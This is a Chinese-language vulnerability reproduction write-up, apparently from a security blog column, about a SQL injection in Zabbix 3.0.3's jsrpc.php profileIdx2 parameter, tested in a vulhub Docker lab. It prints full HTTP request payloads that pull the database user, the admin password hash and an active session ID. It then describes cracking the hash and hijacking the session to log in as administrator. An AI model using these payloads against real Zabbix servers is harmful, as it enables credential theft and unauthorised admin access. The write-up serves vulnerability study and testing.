漏洞介绍:
zabbix是一款服务器监控软件,其由server、agent、web等模块组成,其中web模块由PHP编写,用来显示数据库中的结果。
漏洞环境:
在vulhub执行如下命令,启动zabbix 3.0.3
docker-compose up -d
执行命令后,将启动数据库(mysql)、zabbix server、zabbix agent、zabbix web。如果内存稍小,可能会存在某个容器挂掉的情况,我们可以通过docker-compose ps查看容器状态,并通过docker-compose start来重新启动容器。
漏洞复现
1.这里我通过jsrpc.php页面触发漏洞,我们可以尝试发送如下请求包发现在参数profileIdx2处存在sql注入
GET /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0) HTTP/1.1 Host: 127.0.0.1:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: zbx_sessionid=7689b1e30e63d9726fa86010d3c6592c; PHPSESSID=3r69f0snsemtpmkeiocgg9blj2 Upgrade-Insecure-Requests: 1
2.可以发现存在注入且已经执行了。
3.这时我们可以进一步通过注入获取管理员admin的密码
GET /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=(select 1 from(select count(*),concat((select (select (select concat(0x7e,(select concat(name,0x3a,passwd) from users limit 0,1),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) HTTP/1.1 Host: 192.168.20.129:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: zbx_sessionid=0d01a6ed6433f8453fa9ba4cad4e7721; PHPSESSID=62hs5tn5o67q8u2q7nc2cm1hk7 Upgrade-Insecure-Requests: 1
4.获取md5密码拿去解密
5.之后就可以登录管理员后台了
6.我们还可以直接通过注入获取sessionid,通过修改sessionid直接登陆
GET /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x7e,(select%20sessionid%20from%20sessions%20limit%200,1),0x7e)))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1 Host: 192.168.20.129:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: zbx_sessionid=977585848ca35d41eca4cb96b55a036b; PHPSESSID=kp27a0viri5923ul6q9jkrvu80 Upgrade-Insecure-Requests: 1
7.用获得的这串sessionid就可以直接登录后台了
本文作者:hatjwe
本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/139686.html